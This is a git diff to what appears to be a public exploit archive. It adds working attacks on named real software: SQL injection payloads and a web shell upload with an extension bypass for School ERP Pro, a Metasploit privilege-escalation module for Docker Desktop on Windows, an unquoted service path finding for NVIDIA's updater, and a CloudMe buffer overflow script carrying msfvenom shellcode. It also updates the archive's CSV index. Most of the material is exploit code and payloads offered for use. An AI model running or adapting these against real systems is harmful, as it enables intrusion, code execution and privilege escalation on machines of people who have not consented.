diff --git a/exploits/windows/local/48387.txt b/exploits/macos/local/48387.txt similarity index 96% rename from exploits/windows/local/48387.txt rename to exploits/macos/local/48387.txt index 3db90cdc7..a41513a99 100644 --- a/exploits/windows/local/48387.txt +++ b/exploits/macos/local/48387.txt @@ -4,7 +4,7 @@ # Vendor Homepage: https://www.valvesoftware.com/en/ # Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302 # Tested on: MacOS 15.3 -# CVE : N/A +# CVE : CVE-2020-12242 import os, random, sys banner = """ diff --git a/exploits/php/webapps/48390.txt b/exploits/php/webapps/48390.txt new file mode 100644 index 000000000..90c220b18 --- /dev/null +++ b/exploits/php/webapps/48390.txt @@ -0,0 +1,44 @@ +# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection +# Date: 2020-04-28 +# Author: Besim ALTINOK +# Vendor Homepage: http://arox.in +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/ +# Version: latest version +# Tested on: Xampp +# Credit: İsmail BOZKURT + +SQL Injection Detail +-------------------------------- +*# Vulnerable parameter: es_messagesid* +*# Vulnerable code:* + +if($action=="fullmessage_sent"){ +$msg_qry ="SELECT * FROM es_messages WHERE +from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and +es_messagesid=".*$es_messagesid;* +$details_message=$db->getrow($msg_qry); +} +?> + +*Here is the SQLmap output:* +*----------------------------------------* + +GET parameter '*es_messagesid*' is vulnerable. +sqlmap identified the following injection point(s): +--- +Parameter: es_messagesid (GET) +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT) +Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT +6369=6369 + +Type: UNION query +Title: Generic UNION query (random number) - 12 columns +Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL +SELECT +6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- +- +--- +[01:09:41] [INFO] testing MySQL +[01:09:42] [INFO] confirming MySQL +[01:09:44] [INFO] the back-end DBMS is MySQL \ No newline at end of file diff --git a/exploits/php/webapps/48392.txt b/exploits/php/webapps/48392.txt new file mode 100644 index 000000000..b6e2f697c --- /dev/null +++ b/exploits/php/webapps/48392.txt @@ -0,0 +1,103 @@ +# Exploit Title: School ERP Pro 1.0 - Remote Code Execution +# Date: 2020-04-28 +# Author: Besim ALTINOK +# Vendor Homepage: http://arox.in +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/ +# Version: latest version +# Tested on: Xampp +# Credit: İsmail BOZKURT + +Description +------------------------------------------- +A student can send a message to the admin. Additionally, with this method, +the student can upload a PHP file to the system and run code in the system. + +------------------------------------ +*Vulnerable code - 1: (for student area) - sendmail.inc.php* +- Student user can send message to admin with the attachment +------------------------------------ +$image_file = basename($_FILES['newimage']['name'][$i]); +$ext=explode(".",$_FILES['newimage']['name'][$i]); +$str=date("mdY_hms"); +//$t=rand(1, 15); +$new_thumbname = "$ext[0]".$str.$t.".".$ext[1]; +$updir = "images/messagedoc/"; +$dest_path = $updir.$new_thumbname; +$up_images[$i] = $dest_path; +$srcfile = $_FILES['newimage']['tmp_name'][$i]; +@move_uploaded_file($srcfile, $dest_path); +$ins_arr_prod_images = array( +'`es_messagesid`' => $id, +'`message_doc`' => $new_thumbname +); +$idss=$db->insert("es_message_documents",$ins_arr_prod_images); + +--------------------------------------------------- +*PoC of the Remote Code Execution* +--------------------------------------------------- + +POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 *************************** +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin +Content-Type: multipart/form-data; +boundary=---------------------------2104557667975595321153031663 +Content-Length: 718 +DNT: 1 +Connection: close +Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c +Upgrade-Insecure-Requests: 1 + +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="subject" + +DEDED +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="message" + +

DEDED

+-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="newimage[]"; filename="shell.php" +Content-Type: text/php + + + +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="filecount[]" + +1 +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="submit_staff" + +Send +-----------------------------2104557667975595321153031663-- + + +------------------------------------ +*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php* +- Admin user can update user profile photo +------------------------------------ +if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) { +$ext = explode(".",$_FILES['pre_image']['name']); +$str = date("mdY_hms"); +$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; +$updir = "images/student_photos/"; +$uppath = $updir.$new_thumbname; +move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath); +$file = $new_thumbname; + +------------------------------------ +Bypass Technique: +------------------------------------ + +$_FILES['pre_image']['name']; --- > shell.php.png +$ext = explode(".",$_FILES['pre_image']['name']); +--- +$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; +$ext[0] --> shell +$ext[1] --> php +lastfilename --> st_date_shell.php \ No newline at end of file diff --git a/exploits/windows/local/48388.rb b/exploits/windows/local/48388.rb new file mode 100755 index 000000000..f63e3ffa5 --- /dev/null +++ b/exploits/windows/local/48388.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Post::Windows::Priv + include Post::Windows::Runas + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', + 'Description' => %q{ + This exploit leverages a vulnerability in docker desktop + community editions prior to 2.1.0.1 where an attacker can write + a payload to a lower-privileged area to be executed + automatically by the docker user at login. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Morgan Roman', # discovery + 'bwatters-r7', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'WfsDelay' => 15 + }, + 'DisclosureDate' => '2019-07-05', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK ] + }, + 'References' => [ + ['CVE', '2019-15752'], + ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] + ] + ) + ) + register_options( + [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] + ) + end + + def docker_version + output = cmd_exec('cmd.exe', '/c docker -v') + vprint_status(output) + version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0] + Gem::Version.new(version_string.split('.').map(&:to_i).join('.')) + end + + def check + if docker_version <= Gem::Version.new('18.09.0') + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + check_permissions! + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + # make payload + docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin") + fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) + payload_name = 'docker-credential-wincred.exe' + payload_pathname = "#{docker_path}\\#{payload_name}" + vprint_status('Making Payload') + payload = generate_payload_exe + + # upload Payload + vprint_status("Uploading Payload to #{payload_pathname}") + write_file(payload_pathname, payload) + vprint_status('Payload Upload Complete') + print_status('Waiting for user to attempt to login') + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + end +end \ No newline at end of file diff --git a/exploits/windows/local/48391.txt b/exploits/windows/local/48391.txt new file mode 100644 index 000000000..851b86153 --- /dev/null +++ b/exploits/windows/local/48391.txt @@ -0,0 +1,36 @@ +# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path +# Discovery by: Roberto Piña +# Discovery Date: 2020-04-27 +# Vendor Homepage: https://www.nvidia.com/es-la/ +# Software Link : https://www.nvidia.com/es-la/ +# Tested Version: 1.0.21 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """ +NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto + +C:\>sc qc nvUpdatusService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: nvUpdatusService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START (DELAYED) + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : NVIDIA Update Service Daemon + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: .\UpdatusUser + +C:\> + +#Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/remote/48389.py b/exploits/windows/remote/48389.py new file mode 100755 index 000000000..bb9417d74 --- /dev/null +++ b/exploits/windows/remote/48389.py @@ -0,0 +1,48 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) +# Date: 2020-04-27 +# Exploit Author: Andy Bowden +# Vendor Homepage: https://www.cloudme.com/en +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: CloudMe 1.11.2 +# Tested on: Windows 10 x86 + +#Instructions: +# Start the CloudMe service and run the script. + +import socket + +target = "127.0.0.1" + +padding1 = b"\x90" * 1052 +EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET +NOPS = b"\x90" * 30 + +#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python +payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" +payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" +payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" +payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" +payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" +payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" +payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" +payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" +payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" +payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" +payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" +payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" +payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" +payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" +payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" +payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" +payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f" + +overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) + +buf = padding1 + EIP + NOPS + payload + overrun + +try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,8888)) + s.send(buf) +except Exception as e: + print(sys.exc_value) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cd1147589..92d972697 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, -48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows, +48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos, +48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows, +48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux, 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux, 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows, +48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port 48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware, 48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php, 48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php, +48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php, +48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,